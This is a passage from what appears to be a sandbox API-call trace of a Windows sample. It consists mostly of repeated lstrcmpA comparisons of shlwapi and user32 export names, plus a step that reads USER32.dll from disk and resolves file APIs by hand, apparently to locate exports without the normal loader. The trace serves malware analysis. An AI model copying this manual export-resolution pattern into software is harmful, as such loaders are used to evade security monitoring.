lpString2="AssocCreate") returned 1 [0289.975] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0289.975] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0289.975] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0289.975] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0289.975] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0289.975] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0289.975] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0289.975] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0289.975] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0289.975] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0289.976] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0289.976] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0289.976] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0289.976] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0289.976] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0289.976] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0289.976] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0289.976] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0289.976] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0289.977] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0289.977] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0289.977] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0289.977] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0289.977] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0289.978] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0289.978] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0289.978] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0289.978] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0289.978] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0289.978] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0289.978] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0289.978] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0289.978] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0289.978] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0289.978] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0289.979] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0289.979] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0289.979] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0289.979] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0289.979] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0289.979] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0289.979] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0289.979] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0289.979] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0289.979] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0289.979] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0289.979] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0289.979] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0289.979] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0289.979] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0289.979] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0289.979] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0289.979] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0289.979] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0289.979] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0289.979] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0289.979] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0289.979] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0289.979] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0289.979] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0289.980] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0289.980] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0289.980] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0289.980] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0289.980] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0289.980] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0289.980] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0289.980] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0289.980] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0289.980] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0289.980] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0289.980] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0289.980] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0289.980] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0289.980] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0289.980] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0289.980] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0289.980] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0289.980] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0289.980] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0289.980] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0289.980] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0289.980] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0289.980] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0289.980] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0289.980] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0289.980] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0289.980] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0289.980] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0289.980] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0289.980] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0289.980] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0289.980] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0289.980] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0289.980] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0289.981] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0289.981] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0289.981] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0289.982] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0289.982] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0289.982] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0289.982] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0289.982] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0289.982] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0289.982] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0289.982] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0289.982] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0289.982] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0289.983] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0289.983] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0289.983] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0289.983] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0289.983] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0289.983] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0289.983] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0289.983] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0289.983] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0289.983] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0289.983] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0290.086] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0290.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0290.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0290.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0290.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0290.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0290.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0290.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0290.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0290.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0290.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0290.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0290.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0290.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0290.086] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0290.087] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0290.087] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0290.087] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0290.087] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0290.087] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0290.087] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0290.087] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0290.087] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0290.087] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0290.087] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0290.087] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0290.087] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0290.087] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0290.087] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0290.087] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0290.087] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0290.087] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0290.087] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0290.087] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0290.087] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0290.087] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0290.088] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0290.088] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0290.088] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0290.088] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0290.107] GetProcessHeap () returned 0x540000 [0290.107] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x540000) returned 1 [0290.107] GetProcessHeap () returned 0x540000 [0290.107] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x559160 [0290.107] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0290.108] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0290.108] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0290.108] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0290.109] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0290.109] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0290.109] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0290.109] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0290.109] GetProcessHeap () returned 0x540000 [0290.109] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1555b8) returned 0x4109040 [0290.114] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0290.114] ReadFile (in: hFile=0x17c, lpBuffer=0x4109040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4109040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0290.273] CloseHandle (hObject=0x17c) returned 1 [0290.273] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0290.273] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0290.273] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0290.273] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0290.273] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0290.273] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0290.273] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0290.273] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0290.273] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0290.273] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0290.273] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0290.273] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0290.274] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0290.274] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0290.274] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0290.274] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0290.274] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0290.274] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0290.274] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0290.274] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0290.274] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0290.274] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0290.274] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0290.274] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0290.274] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0290.274] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0290.274] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0290.274] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0290.274] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0290.274] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0290.274] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 